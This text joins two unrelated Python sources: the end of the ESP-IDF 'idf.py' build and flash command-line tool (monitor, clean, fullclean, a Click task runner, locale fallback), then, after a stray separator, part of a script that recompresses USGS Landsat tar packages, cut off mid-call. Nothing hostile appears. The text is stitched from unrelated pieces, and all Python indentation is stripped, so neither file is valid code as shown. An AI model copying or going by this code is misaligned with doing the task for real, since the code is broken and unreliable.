desc_path = os.path.join(args.build_dir, "project_description.json")
if not os.path.exists(desc_path):
_ensure_build_directory(args)
with open(desc_path, "r") as f:
project_desc = json.load(f)
elf_file = os.path.join(args.build_dir, project_desc["app_elf"])
if not os.path.exists(elf_file):
raise FatalError(
"ELF file '%s' not found. You need to build & flash the project before running 'monitor', "
"and the binary on the device must match the one in the build directory exactly. "
"Try '%s flash monitor'." % (elf_file, PROG)
)
idf_monitor = os.path.join(os.environ["IDF_PATH"], "tools/idf_monitor.py")
monitor_args = [PYTHON, idf_monitor]
if args.port is not None:
monitor_args += ["-p", args.port]
monitor_args += ["-b", project_desc["monitor_baud"]]
if print_filter is not None:
monitor_args += ["--print_filter", print_filter]
monitor_args += [elf_file]
idf_py = [PYTHON] + get_commandline_options(ctx) # commands to re-run idf.py
monitor_args += ["-m", " ".join("'%s'" % a for a in idf_py)]
if "MSYSTEM" in os.environ:
monitor_args = ["winpty"] + monitor_args
_run_tool("idf_monitor", monitor_args, args.project_dir)
def clean(action, ctx, args):
if not os.path.isdir(args.build_dir):
print("Build directory '%s' not found. Nothing to clean." % args.build_dir)
return
build_target("clean", ctx, args)
def reconfigure(action, ctx, args):
_ensure_build_directory(args, True)
def _delete_windows_symlinks(directory):
"""
It deletes symlinks recursively on Windows. It is useful for Python 2 which doesn't detect symlinks on Windows.
"""
deleted_paths = []
if os.name == "nt":
import ctypes
for root, dirnames, _filenames in os.walk(directory):
for d in dirnames:
full_path = os.path.join(root, d)
try:
full_path = full_path.decode("utf-8")
except Exception:
pass
if ctypes.windll.kernel32.GetFileAttributesW(full_path) & 0x0400:
os.rmdir(full_path)
deleted_paths.append(full_path)
return deleted_paths
def fullclean(action, ctx, args):
build_dir = args.build_dir
if not os.path.isdir(build_dir):
print("Build directory '%s' not found. Nothing to clean." % build_dir)
return
if len(os.listdir(build_dir)) == 0:
print("Build directory '%s' is empty. Nothing to clean." % build_dir)
return
if not os.path.exists(os.path.join(build_dir, "CMakeCache.txt")):
raise FatalError(
"Directory '%s' doesn't seem to be a CMake build directory. Refusing to automatically "
"delete files in this directory. Delete the directory manually to 'clean' it."
% build_dir
)
red_flags = ["CMakeLists.txt", ".git", ".svn"]
for red in red_flags:
red = os.path.join(build_dir, red)
if os.path.exists(red):
raise FatalError(
"Refusing to automatically delete files in directory containing '%s'. Delete files manually if you're sure."
% red
)
# OK, delete everything in the build directory...
# Note: Python 2.7 doesn't detect symlinks on Windows (it is supported form 3.2). Tools promising to not
# follow symlinks will actually follow them. Deleting the build directory with symlinks deletes also items
# outside of this directory.
deleted_symlinks = _delete_windows_symlinks(build_dir)
if args.verbose and len(deleted_symlinks) > 1:
print(
"The following symlinks were identified and removed:\n%s"
% "\n".join(deleted_symlinks)
)
for f in os.listdir(
build_dir
): # TODO: once we are Python 3 only, this can be os.scandir()
f = os.path.join(build_dir, f)
if args.verbose:
print("Removing: %s" % f)
if os.path.isdir(f):
shutil.rmtree(f)
else:
os.remove(f)
def _safe_relpath(path, start=None):
""" Return a relative path, same as os.path.relpath, but only if this is possible.
It is not possible on Windows, if the start directory and the path are on different drives.
"""
try:
return os.path.relpath(path, os.curdir if start is None else start)
except ValueError:
return os.path.abspath(path)
def get_commandline_options(ctx):
""" Return all the command line options up to first action """
# This approach ignores argument parsing done Click
result = []
for arg in sys.argv:
if arg in ctx.command.commands_with_aliases:
break
result.append(arg)
return result
def get_default_serial_port():
""" Return a default serial port. esptool can do this (smarter), but it can create
inconsistencies where esptool.py uses one port and idf_monitor uses another.
Same logic as esptool.py search order, reverse sort by name and choose the first port.
"""
# Import is done here in order to move it after the check_environment() ensured that pyserial has been installed
import serial.tools.list_ports
ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
try:
print(
"Choosing default port %s (use '-p PORT' option to set a specific serial port)"
% ports[0].encode("ascii", "ignore")
)
return ports[0]
except IndexError:
raise RuntimeError(
"No serial ports found. Connect a device, or use '-p PORT' option to set a specific port."
)
class PropertyDict(dict):
def __init__(self, *args, **kwargs):
super(PropertyDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def init_cli():
# Click is imported here to run it after check_environment()
import click
class Task(object):
def __init__(
self, callback, name, aliases, dependencies, order_dependencies, action_args
):
self.callback = callback
self.name = name
self.dependencies = dependencies
self.order_dependencies = order_dependencies
self.action_args = action_args
self.aliases = aliases
def run(self, context, global_args, action_args=None):
if action_args is None:
action_args = self.action_args
self.callback(self.name, context, global_args, **action_args)
class Action(click.Command):
def __init__(
self,
name=None,
aliases=None,
dependencies=None,
order_dependencies=None,
**kwargs
):
super(Action, self).__init__(name, **kwargs)
self.name = self.name or self.callback.__name__
if aliases is None:
aliases = []
self.aliases = aliases
self.help = self.help or self.callback.__doc__
if self.help is None:
self.help = ""
if dependencies is None:
dependencies = []
if order_dependencies is None:
order_dependencies = []
# Show first line of help if short help is missing
self.short_help = self.short_help or self.help.split("\n")[0]
# Add aliases to help string
if aliases:
aliases_help = "Aliases: %s." % ", ".join(aliases)
self.help = "\n".join([self.help, aliases_help])
self.short_help = " ".join([aliases_help, self.short_help])
if self.callback is not None:
callback = self.callback
def wrapped_callback(**action_args):
return Task(
callback=callback,
name=self.name,
dependencies=dependencies,
order_dependencies=order_dependencies,
action_args=action_args,
aliases=self.aliases,
)
self.callback = wrapped_callback
class Argument(click.Argument):
"""Positional argument"""
def __init__(self, **kwargs):
names = kwargs.pop("names")
super(Argument, self).__init__(names, **kwargs)
class Scope(object):
"""
Scope for sub-command option.
possible values:
- default - only available on defined level (global/action)
- global - When defined for action, also available as global
- shared - Opposite to 'global': when defined in global scope, also available for all actions
"""
SCOPES = ("default", "global", "shared")
def __init__(self, scope=None):
if scope is None:
self._scope = "default"
elif isinstance(scope, str) and scope in self.SCOPES:
self._scope = scope
elif isinstance(scope, Scope):
self._scope = str(scope)
else:
raise FatalError("Unknown scope for option: %s" % scope)
@property
def is_global(self):
return self._scope == "global"
@property
def is_shared(self):
return self._scope == "shared"
def __str__(self):
return self._scope
class Option(click.Option):
"""Option that knows whether it should be global"""
def __init__(self, scope=None, **kwargs):
kwargs["param_decls"] = kwargs.pop("names")
super(Option, self).__init__(**kwargs)
self.scope = Scope(scope)
if self.scope.is_global:
self.help += " This option can be used at most once either globally, or for one subcommand."
class CLI(click.MultiCommand):
"""Action list contains all actions with options available for CLI"""
def __init__(self, action_lists=None, help=None):
super(CLI, self).__init__(
chain=True,
invoke_without_command=True,
result_callback=self.execute_tasks,
context_settings={"max_content_width": 140},
help=help,
)
self._actions = {}
self.global_action_callbacks = []
self.commands_with_aliases = {}
if action_lists is None:
action_lists = []
shared_options = []
for action_list in action_lists:
# Global options
for option_args in action_list.get("global_options", []):
option = Option(**option_args)
self.params.append(option)
if option.scope.is_shared:
shared_options.append(option)
for action_list in action_lists:
# Global options validators
self.global_action_callbacks.extend(
action_list.get("global_action_callbacks", [])
)
for action_list in action_lists:
# Actions
for name, action in action_list.get("actions", {}).items():
arguments = action.pop("arguments", [])
options = action.pop("options", [])
if arguments is None:
arguments = []
if options is None:
options = []
self._actions[name] = Action(name=name, **action)
for alias in [name] + action.get("aliases", []):
self.commands_with_aliases[alias] = name
for argument_args in arguments:
self._actions[name].params.append(Argument(**argument_args))
# Add all shared options
for option in shared_options:
self._actions[name].params.append(option)
for option_args in options:
option = Option(**option_args)
if option.scope.is_shared:
raise FatalError(
'"%s" is defined for action "%s". '
' "shared" options can be declared only on global level' % (option.name, name)
)
# Promote options to global if see for the first time
if option.scope.is_global and option.name not in [o.name for o in self.params]:
self.params.append(option)
self._actions[name].params.append(option)
def list_commands(self, ctx):
return sorted(self._actions)
def get_command(self, ctx, name):
return self._actions.get(self.commands_with_aliases.get(name))
def _print_closing_message(self, args, actions):
# print a closing message of some kind
#
if "flash" in str(actions):
print("Done")
return
# Otherwise, if we built any binaries print a message about
# how to flash them
def print_flashing_message(title, key):
print("\n%s build complete. To flash, run this command:" % title)
with open(os.path.join(args.build_dir, "flasher_args.json")) as f:
flasher_args = json.load(f)
def flasher_path(f):
return _safe_relpath(os.path.join(args.build_dir, f))
if key != "project": # flashing a single item
cmd = ""
if (
key == "bootloader"
): # bootloader needs --flash-mode, etc to be passed in
cmd = " ".join(flasher_args["write_flash_args"]) + " "
cmd += flasher_args[key]["offset"] + " "
cmd += flasher_path(flasher_args[key]["file"])
else: # flashing the whole project
cmd = " ".join(flasher_args["write_flash_args"]) + " "
flash_items = sorted(
(
(o, f)
for (o, f) in flasher_args["flash_files"].items()
if len(o) > 0
),
key=lambda x: int(x[0], 0),
)
for o, f in flash_items:
cmd += o + " " + flasher_path(f) + " "
print(
"%s -p %s -b %s --after %s write_flash %s"
% (
_safe_relpath(
"%s/components/esptool_py/esptool/esptool.py"
% os.environ["IDF_PATH"]
),
args.port or "(PORT)",
args.baud,
flasher_args["extra_esptool_args"]["after"],
cmd.strip(),
)
)
print(
"or run 'idf.py -p %s %s'"
% (
args.port or "(PORT)",
key + "-flash" if key != "project" else "flash",
)
)
if "all" in actions or "build" in actions:
print_flashing_message("Project", "project")
else:
if "app" in actions:
print_flashing_message("App", "app")
if "partition_table" in actions:
print_flashing_message("Partition Table", "partition_table")
if "bootloader" in actions:
print_flashing_message("Bootloader", "bootloader")
def execute_tasks(self, tasks, **kwargs):
ctx = click.get_current_context()
global_args = PropertyDict(ctx.params)
# Set propagated global options
for task in tasks:
for key in list(task.action_args):
option = next((o for o in ctx.command.params if o.name == key), None)
if option and (option.scope.is_global or option.scope.is_shared):
local_value = task.action_args.pop(key)
global_value = global_args[key]
default = () if option.multiple else option.default
if global_value != default and local_value != default and global_value != local_value:
raise FatalError(
'Option "%s" provided for "%s" is already defined to a different value. '
"This option can appear at most once in the command line." % (key, task.name)
)
if local_value != default:
global_args[key] = local_value
# Validate global arguments
for action_callback in ctx.command.global_action_callbacks:
action_callback(ctx, global_args, tasks)
# very simple dependency management
completed_tasks = set()
if not tasks:
print(ctx.get_help())
ctx.exit()
while tasks:
task = tasks[0]
tasks_dict = dict([(t.name, t) for t in tasks])
name_with_aliases = task.name
if task.aliases:
name_with_aliases += " (aliases: %s)" % ", ".join(task.aliases)
ready_to_run = True
for dep in task.dependencies:
if dep not in completed_tasks:
print(
'Adding %s\'s dependency "%s" to list of actions'
% (task.name, dep)
)
dep_task = ctx.invoke(ctx.command.get_command(ctx, dep))
# Remove global options from dependent tasks
for key in list(dep_task.action_args):
option = next((o for o in ctx.command.params if o.name == key), None)
if option and (option.scope.is_global or option.scope.is_shared):
dep_task.action_args.pop(key)
tasks.insert(0, dep_task)
ready_to_run = False
for dep in task.order_dependencies:
if dep in tasks_dict.keys() and dep not in completed_tasks:
tasks.insert(0, tasks.pop(tasks.index(tasks_dict[dep])))
ready_to_run = False
if ready_to_run:
tasks.pop(0)
if task.name in completed_tasks:
print(
"Skipping action that is already done: %s"
% name_with_aliases
)
else:
print("Executing action: %s" % name_with_aliases)
task.run(ctx, global_args, task.action_args)
completed_tasks.add(task.name)
self._print_closing_message(global_args, completed_tasks)
@staticmethod
def merge_action_lists(*action_lists):
merged_actions = {
"global_options": [],
"actions": {},
"global_action_callbacks": [],
}
for action_list in action_lists:
merged_actions["global_options"].extend(
action_list.get("global_options", [])
)
merged_actions["actions"].update(action_list.get("actions", {}))
merged_actions["global_action_callbacks"].extend(
action_list.get("global_action_callbacks", [])
)
return merged_actions
# That's a tiny parser that parse project-dir even before constructing
# fully featured click parser to be sure that extensions are loaded from the right place
@click.command(
add_help_option=False,
context_settings={"allow_extra_args": True, "ignore_unknown_options": True},
)
@click.option("-C", "--project-dir", default=os.getcwd())
def parse_project_dir(project_dir):
return _realpath(project_dir)
project_dir = parse_project_dir(standalone_mode=False)
# Load base idf commands
def validate_root_options(ctx, args, tasks):
args.project_dir = _realpath(args.project_dir)
if args.build_dir is not None and args.project_dir == _realpath(args.build_dir):
raise FatalError(
"Setting the build directory to the project directory is not supported. Suggest dropping "
"--build-dir option, the default is a 'build' subdirectory inside the project directory."
)
if args.build_dir is None:
args.build_dir = os.path.join(args.project_dir, "build")
args.build_dir = _realpath(args.build_dir)
# Possible keys for action dict are: global_options, actions and global_action_callbacks
global_options = [
{
"names": ["-D", "--define-cache-entry"],
"help": "Create a cmake cache entry.",
"scope": "global",
"multiple": True,
}
]
root_options = {
"global_options": [
{
"names": ["-C", "--project-dir"],
"help": "Project directory.",
"type": click.Path(),
"default": os.getcwd(),
},
{
"names": ["-B", "--build-dir"],
"help": "Build directory.",
"type": click.Path(),
"default": None,
},
{
"names": ["-n", "--no-warnings"],
"help": "Disable Cmake warnings.",
"is_flag": True,
"default": True,
},
{
"names": ["-v", "--verbose"],
"help": "Verbose build output.",
"is_flag": True,
"default": False,
},
{
"names": ["--ccache/--no-ccache"],
"help": "Use ccache in build. Disabled by default.",
"is_flag": True,
"default": False,
},
{
"names": ["-G", "--generator"],
"help": "CMake generator.",
"type": click.Choice(GENERATOR_CMDS.keys()),
},
],
"global_action_callbacks": [validate_root_options],
}
build_actions = {
"actions": {
"all": {
"aliases": ["build"],
"callback": build_target,
"short_help": "Build the project.",
"help": "Build the project. This can involve multiple steps:\n\n"
+ "1. Create the build directory if needed. The sub-directory 'build' is used to hold build output, "
+ "although this can be changed with the -B option.\n\n"
+ "2. Run CMake as necessary to configure the project and generate build files for the main build tool.\n\n"
+ "3. Run the main build tool (Ninja or GNU Make). By default, the build tool is automatically detected "
+ "but it can be explicitly set by passing the -G option to idf.py.\n\n",
"options": global_options,
"order_dependencies": [
"reconfigure",
"menuconfig",
"clean",
"fullclean",
],
},
"menuconfig": {
"callback": build_target,
"help": 'Run "menuconfig" project configuration tool.',
"options": global_options,
},
"confserver": {
"callback": build_target,
"help": "Run JSON configuration server.",
"options": global_options,
},
"size": {
"callback": build_target,
"help": "Print basic size information about the app.",
"options": global_options,
"dependencies": ["app"],
},
"size-components": {
"callback": build_target,
"help": "Print per-component size information.",
"options": global_options,
"dependencies": ["app"],
},
"size-files": {
"callback": build_target,
"help": "Print per-source-file size information.",
"options": global_options,
"dependencies": ["app"],
},
"bootloader": {
"callback": build_target,
"help": "Build only bootloader.",
"options": global_options,
},
"app": {
"callback": build_target,
"help": "Build only the app.",
"order_dependencies": ["clean", "fullclean", "reconfigure"],
"options": global_options,
},
"efuse_common_table": {
"callback": build_target,
"help": "Genereate C-source for IDF's eFuse fields.",
"order_dependencies": ["reconfigure"],
"options": global_options,
},
"efuse_custom_table": {
"callback": build_target,
"help": "Genereate C-source for user's eFuse fields.",
"order_dependencies": ["reconfigure"],
"options": global_options,
},
"show_efuse_table": {
"callback": build_target,
"help": "Print eFuse table.",
"order_dependencies": ["reconfigure"],
"options": global_options,
},
"partition_table": {
"callback": build_target,
"help": "Build only partition table.",
"order_dependencies": ["reconfigure"],
"options": global_options,
},
"erase_otadata": {
"callback": build_target,
"help": "Erase otadata partition.",
"options": global_options,
},
"read_otadata": {
"callback": build_target,
"help": "Read otadata partition.",
"options": global_options,
},
}
}
clean_actions = {
"actions": {
"reconfigure": {
"callback": reconfigure,
"short_help": "Re-run CMake.",
"help": "Re-run CMake even if it doesn't seem to need re-running. This isn't necessary during normal usage, "
+ "but can be useful after adding/removing files from the source tree, or when modifying CMake cache variables. "
+ "For example, \"idf.py -DNAME='VALUE' reconfigure\" "
+ 'can be used to set variable "NAME" in CMake cache to value "VALUE".',
"options": global_options,
"order_dependencies": ["menuconfig"],
},
"clean": {
"callback": clean,
"short_help": "Delete build output files from the build directory.",
"help": "Delete build output files from the build directory , forcing a 'full rebuild' the next time "
+ "the project is built. Cleaning doesn't delete CMake configuration output and some other files",
"order_dependencies": ["fullclean"],
},
"fullclean": {
"callback": fullclean,
"short_help": "Delete the entire build directory contents.",
"help": "Delete the entire build directory contents. This includes all CMake configuration output."
+ "The next time the project is built, CMake will configure it from scratch. "
+ "Note that this option recursively deletes all files in the build directory, so use with care."
+ "Project configuration is not deleted.",
},
}
}
baud_rate = {
"names": ["-b", "--baud"],
"help": "Baud rate.",
"scope": "global",
"envvar": "ESPBAUD",
"default": 460800,
}
port = {
"names": ["-p", "--port"],
"help": "Serial port.",
"scope": "global",
"envvar": "ESPPORT",
"default": None,
}
serial_actions = {
"actions": {
"flash": {
"callback": flash,
"help": "Flash the project.",
"options": global_options + [baud_rate, port],
"dependencies": ["all"],
"order_dependencies": ["erase_flash"],
},
"erase_flash": {
"callback": erase_flash,
"help": "Erase entire flash chip.",
"options": [baud_rate, port],
},
"monitor": {
"callback": monitor,
"help": "Display serial output.",
"options": [
port,
{
"names": ["--print-filter", "--print_filter"],
"help": (
"Filter monitor output.\n"
"Restrictions on what to print can be specified as a series of <tag>:<log_level> items "
"where <tag> is the tag string and <log_level> is a character from the set "
"{N, E, W, I, D, V, *} referring to a level. "
'For example, "tag1:W" matches and prints only the outputs written with '
'ESP_LOGW("tag1", ...) or at lower verbosity level, i.e. ESP_LOGE("tag1", ...). '
'Not specifying a <log_level> or using "*" defaults to Verbose level.\n'
'Please see the IDF Monitor section of the ESP-IDF documentation '
'for a more detailed description and further examples.'),
"default": None,
},
],
"order_dependencies": [
"flash",
"partition_table-flash",
"bootloader-flash",
"app-flash",
],
},
"partition_table-flash": {
"callback": flash,
"help": "Flash partition table only.",
"options": [baud_rate, port],
"dependencies": ["partition_table"],
"order_dependencies": ["erase_flash"],
},
"bootloader-flash": {
"callback": flash,
"help": "Flash bootloader only.",
"options": [baud_rate, port],
"dependencies": ["bootloader"],
"order_dependencies": ["erase_flash"],
},
"app-flash": {
"callback": flash,
"help": "Flash the app only.",
"options": [baud_rate, port],
"dependencies": ["app"],
"order_dependencies": ["erase_flash"],
},
"encrypted-app-flash": {
"callback": flash,
"help": "Flash the encrypted app only.",
"dependencies": ["app"],
"order_dependencies": ["erase_flash"],
},
"encrypted-flash": {
"callback": flash,
"help": "Flash the encrypted project.",
"dependencies": ["all"],
"order_dependencies": ["erase_flash"],
},
},
}
base_actions = CLI.merge_action_lists(
root_options, build_actions, clean_actions, serial_actions
)
all_actions = [base_actions]
# Load extensions
if os.path.exists(os.path.join(project_dir, "idf_ext.py")):
sys.path.append(project_dir)
try:
from idf_ext import action_extensions
except ImportError:
print("Error importing extension file idf_ext.py. Skipping.")
print(
"Please make sure that it contains implementation (even if it's empty) of add_action_extensions"
)
# Add actions extensions
try:
all_actions.append(action_extensions(base_actions, project_dir))
except NameError:
pass
return CLI(help="ESP-IDF build management", action_lists=all_actions)
def main():
check_environment()
cli = init_cli()
cli(prog_name=PROG)
def _valid_unicode_config():
# Python 2 is always good
if sys.version_info[0] == 2:
return True
# With python 3 unicode environment is required
try:
return codecs.lookup(locale.getpreferredencoding()).name != "ascii"
except Exception:
return False
def _find_usable_locale():
try:
locales = subprocess.Popen(
["locale", "-a"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()[0]
except OSError:
locales = ""
if isinstance(locales, bytes):
locales = locales.decode("ascii", "replace")
usable_locales = []
for line in locales.splitlines():
locale = line.strip()
locale_name = locale.lower().replace("-", "")
# C.UTF-8 is the best option, if supported
if locale_name == "c.utf8":
return locale
if locale_name.endswith(".utf8"):
# Make a preference of english locales
if locale.startswith("en_"):
usable_locales.insert(0, locale)
else:
usable_locales.append(locale)
if not usable_locales:
raise FatalError(
"Support for Unicode filenames is required, but no suitable UTF-8 locale was found on your system."
" Please refer to the manual for your operating system for details on locale reconfiguration."
)
return usable_locales[0]
if __name__ == "__main__":
try:
# On MSYS2 we need to run idf.py with "winpty" in order to be able to cancel the subprocesses properly on
# keyboard interrupt (CTRL+C).
# Using an own global variable for indicating that we are running with "winpty" seems to be the most suitable
# option as os.environment['_'] contains "winpty" only when it is run manually from console.
WINPTY_VAR = "WINPTY"
WINPTY_EXE = "winpty"
if ("MSYSTEM" in os.environ) and (
not os.environ.get("_", "").endswith(WINPTY_EXE) and WINPTY_VAR not in os.environ
):
os.environ[WINPTY_VAR] = "1" # the value is of no interest to us
# idf.py calls itself with "winpty" and WINPTY global variable set
ret = subprocess.call(
[WINPTY_EXE, sys.executable] + sys.argv, env=os.environ
)
if ret:
raise SystemExit(ret)
elif os.name == "posix" and not _valid_unicode_config():
# Trying to find best utf-8 locale available on the system and restart python with it
best_locale = _find_usable_locale()
print(
"Your environment is not configured to handle unicode filenames outside of ASCII range."
" Environment variable LC_ALL is temporary set to %s for unicode support."
% best_locale
)
os.environ["LC_ALL"] = best_locale
ret = subprocess.call([sys.executable] + sys.argv, env=os.environ)
if ret:
raise SystemExit(ret)
else:
main()
except FatalError as e:
print(e)
sys.exit(2)
| |
#!/usr/bin/env python
"""
Repackage a USGS Collection-1 tar for faster read access.
They arrive as a *.tar.gz with inner uncompressed tiffs, which Josh's tests have found to be too slow to read.
We compress the inner tiffs and store them in an uncompressed tar. This allows random reads within the files.
We also append a checksum file at the end of the tar.
"""
import copy
import io
import socket
import stat
import sys
import tarfile
import tempfile
import traceback
from contextlib import suppress
from functools import partial
from itertools import chain
from pathlib import Path
from typing import List, Iterable, Tuple, Callable, IO, Dict
import click
import numpy
import rasterio
import structlog
from structlog.processors import (
StackInfoRenderer,
TimeStamper,
format_exc_info,
JSONRenderer,
)
from eodatasets3.ui import PathPath
from eodatasets3.verify import PackageChecksum
_PREDICTOR_TABLE = {
"int8": 2,
"uint8": 2,
"int16": 2,
"uint16": 2,
"int32": 2,
"uint32": 2,
"int64": 2,
"uint64": 2,
"float32": 3,
"float64": 3,
}
# The info of a file, and a method to open the file for reading.
ReadableMember = Tuple[tarfile.TarInfo, Callable[[], IO]]
_LOG = structlog.get_logger()
class RecompressFailure(Exception):
pass
def _create_tarinfo(path: Path, name=None) -> tarfile.TarInfo:
"""
Create a TarInfo ("tar member") based on the given filesystem path.
(these contain the information of a file, such as permissions, when writing to a tar file)
This code is based on TarFile.gettarinfo(), but doesn't need an existing tar file.
"""
# We're avoiding convenience methods like `path.is_file()`, to minimise repeated `stat()` calls on lustre.
s = path.stat()
info = tarfile.TarInfo(name or path.name)
if stat.S_ISREG(s.st_mode):
info.size = s.st_size
info.type = tarfile.REGTYPE
elif stat.S_ISDIR(s.st_mode):
info.type = tarfile.DIRTYPE
info.size = 0
else:
raise NotImplementedError(
f"Only regular files and directories are supported for extracted datasets. "
f"({path.name} in {path.absolute().parent})"
)
info.mode = s.st_mode
info.uid = s.st_uid
info.gid = s.st_gid
info.mtime = s.st_mtime
if tarfile.pwd:
try:
info.uname = tarfile.pwd.getpwuid(info.uid)[0]
except KeyError:
pass
if tarfile.grp:
try:
info.gname = tarfile.grp.getgrgid(info.gid)[0]
except KeyError:
pass
return info
def _tar_members(in_tar: tarfile.TarFile) -> Iterable[ReadableMember]:
"""Get readable files (members) from a tar"""
members: List[tarfile.TarInfo] = in_tar.getmembers()
for member in members:
# We return a lambda/callable so that the file isn't opened until it's needed.
yield member, partial(in_tar.extractfile, member)
def _folder_members(path: Path, base_path: Path = None) -> Iterable[ReadableMember]:
"""
Get readable files (presented as tar members) from a directory.
"""
if not base_path:
base_path = path
# Note that the members in input USGS tars are sorted alphabetically.
# We'll sort our own inputs to match.
# (The primary practical benefit is predictable outputs in tests)
for item in sorted(path.iterdir()):
member = _create_tarinfo(item, name=str(item.relative_to(base_path)))
if member.type == tarfile.DIRTYPE:
yield member, None
yield from _folder_members(item, base_path=path)
else:
# We return a lambda/callable so that the file isn't opened until it's needed.
yield member, partial(item.open, "rb")
def repackage_tar(
input_path: Path,
input_files: Iterable[ReadableMember],
output_tar_path: Path,
clean_inputs: bool,
**compress_args,
) -> bool:
log = _LOG.bind(
name=output_tar_path.stem,
in_path=str(input_path.absolute()),
out_path=str(output_tar_path.absolute()),
)
if output_tar_path.exists():
log.info("skip.exists")
return True
try:
members = list(input_files)
# Add the MTL file to the beginning of the output tar, so it can be accessed faster.
# This slows down this repackage a little, as we're seeking/decompressing the input stream an extra time.
_reorder_tar_members(members, input_path.name)
_create_tar_with_files(input_path, members, output_tar_path, **compress_args)
log.info(
"complete",
in_size=sum(m.size for m, _ in members),
in_count=len(members),
# The user/group give us a hint as to whether this was repackaged outside of USGS.
in_users=list({(member.uname, member.gname) for member, _ in members}),
out_size=output_tar_path.stat().st_size,
)
result_exists = output_tar_path.exists()
if not result_exists:
# This should never happen, so it's an exception.
raise RuntimeError(f"No output after a success? Expected {output_tar_path}")
if clean_inputs:
log.info("input.cleanup")
please_remove(input_path, excluding=output_tar_path)
except Exception:
log.exception("error", exc_info=True)
return False
return True
def _create_tar_with_files(
input_path: Path,
members: List[ReadableMember],
output_tar_path: Path,
**compress_args,
) -> None:
"""
Package and compress the given input files to a new tar path.
The output tar path is written atomically, so on failure it will only exist if complete.
"""
out_dir: Path = output_tar_path.parent
out_dir.mkdir(parents=True, exist_ok=True)
verify = PackageChecksum()
# Use a temporary file so that we can move to the output path atomically.
with tempfile.TemporaryDirectory(prefix=".extract-", dir=str(out_dir)) as tmpdir:
tmpdir = Path(tmpdir).absolute()
tmp_out_tar = tmpdir.joinpath(output_tar_path.name)
with tarfile.open(tmp_out_tar, "w") as out_tar:
with click.progressbar(
label=input_path.name,
length=sum(member.size for member, _ in members),
file=sys.stderr,
) as progress:
file_number = 0
for readable_member in members:
file_number += 1
progress.label = (
f"{input_path.name} ({file_number:2d}/{len(members)})"
)
_recompress_tar_member(
readable_member, out_tar, compress_args, verify, tmpdir
)
member, _ = readable_member
progress.update(member.size)
# Append sha1 checksum file
checksum_path = tmpdir / "package.sha1"
verify.write(checksum_path)
checksum_path.chmod(0o664)
out_tar.add(checksum_path, checksum_path.name)
# Match the lower r/w permission bits to the output folder.
# (Temp directories default to 700 otherwise.)
tmp_out_tar.chmod(out_dir.stat().st_mode & 0o777)
# Our output tar is complete. Move it into place.
tmp_out_tar.rename(output_tar_path)
def _recompress_tar_member(
readable_member: ReadableMember,
out_tar: tarfile.TarFile,
compress_args: Dict,
verify: PackageChecksum,
tmpdir: Path,
):
member, open_member = readable_member
new_member = copy.copy(member)
# Copy with a minimum 664 permission, which is used by USGS tars.
# (some of our repacked datasets have only user read permission.)
new_member.mode = new_member.mode | 0o664
# If it's a tif, check whether it's compressed.
if member.name.lower().endswith(".tif"):
with open_member() as input_fp, rasterio.open(input_fp) as ds:
if not ds.profile.get("compress"):
# No compression: let's compress it
with rasterio.MemoryFile(filename=member.name) as memory_file:
try:
_recompress_image(ds, memory_file, **compress_args)
except Exception as e:
raise RecompressFailure(f"Error during {member.name}") from e
new_member.size = memory_file.getbuffer().nbytes
out_tar.addfile(new_member, memory_file)
# Image has been written. Seek to beginning to take a checksum.
memory_file.seek(0)
verify.add(memory_file, tmpdir / new_member.name)
return
else:
# It's already compressed, we'll fall through and copy it verbatim.
pass
if member.size == 0:
# Typically a directory entry.
out_tar.addfile(new_member)
return
# Copy unchanged into target (typically text/metadata files).
with open_member() as member:
file_contents = member.read()
out_tar.addfile(new_member, io.BytesIO(file_contents))
verify.add(io.BytesIO(file_contents), tmpdir / new_member.name)
del file_contents
def _reorder_tar_members(members: List[ReadableMember], identifier: str):
"""
Put the (tiny) MTL file at the beginning of the tar so that it's always quick to read.
"""
# Find MTL
for i, (member, _) in enumerate(members):
if "_MTL" in member.path:
mtl_index = i
break
else:
formatted_members = "\n\t".join(m.name for m, _ in members)
raise ValueError(
f"No MTL file found in package {identifier}. Have:\n\t{formatted_members}"
)
# Move to front
mtl_item = members.pop(mtl_index)
members.insert(0, mtl_item)
def _recompress_image(
input_image: rasterio.DatasetReader,
output_fp: rasterio.MemoryFile,
zlevel=9,
block_size=(512, 512),
):
"""
Read an image from given file pointer, and write as a compressed GeoTIFF.
"""
# noinspection PyUnusedLocal
block_size_y, block_size_x = block_size
if len(input_image.indexes) != 1:
raise ValueError(
f"Expecting one-band-per-tif input (USGS packages). "
f"Input has multiple layers {repr(input_image.indexes)}"
)
array: numpy.ndarray = input_image.read(1)
profile = input_image.profile
profile.update(
driver="GTiff",
predictor=_PREDICTOR_TABLE[array.dtype.name],
compress="deflate",
zlevel=zlevel,
blockxsize=block_size_x,
blockysize=block_size_y,
tiled=True,
)
with output_fp.open(**profile) as output_dataset:
output_dataset.write(array, 1)
# Copy gdal metadata
output_dataset.update_tags(**input_image.tags())
output_dataset.update_tags(1, **input_image.tags(1))
@click.command(help=__doc__)
@click.option(
"--output-base",
type=PathPath(file_okay=False, writable=True),
help="The base output directory "
"(default to same dir as input if --clean-inputs).",
)
@click.option(
"--zlevel", type=click.IntRange(0, 9), default=5, help="Deflate compression level."
)
@click.option(
"--block-size", type=int, default=512, help="Compression block size (both x and y)"
)
@click.option(
"--clean-inputs/--no-clean-inputs",
default=False,
help="Delete originals after repackaging",
)
@click.option("-f", "input_file", help="Read paths from file", type=click.File("r"))
@click.argument("paths", nargs=-1, type=PathPath(exists=True, readable=True))
def main(
paths: List[Path],
input_file,
output_base: Path,
zlevel: int,
clean_inputs: bool,
block_size: int,
):
# Structured (json) logging goes to stdout
structlog.configure(
processors=[
StackInfoRenderer(),
format_exc_info,
TimeStamper(utc=False, fmt="iso"),
JSONRenderer(),
]
)
if (not output_base) and (not clean_inputs):
raise click.UsageError(
"Need to specify either a different output directory (--output-base) "
"or to clean inputs (--clean-inputs)"
)
if input_file:
paths = chain((Path(p.strip()) for p in input_file), paths)
with rasterio.Env():
total = failures = 0
for path in paths:
total += 1
# Input is either a tar.gz file, or a directory containing an MTL (already extracted)
if path.suffix.lower() == ".gz":
with tarfile.open(str(path), "r") as in_tar:
success = repackage_tar(
path,
_tar_members(in_tar),
_output_tar_path(output_base, path),
clean_inputs=clean_inputs,
zlevel=zlevel,
block_size=(block_size, block_size),
)
elif path.is_dir():
success = repackage_tar(
path,
_folder_members(path),
_output_tar_path_from_directory(output_base, path),
clean_inputs=clean_inputs,
zlevel=zlevel,
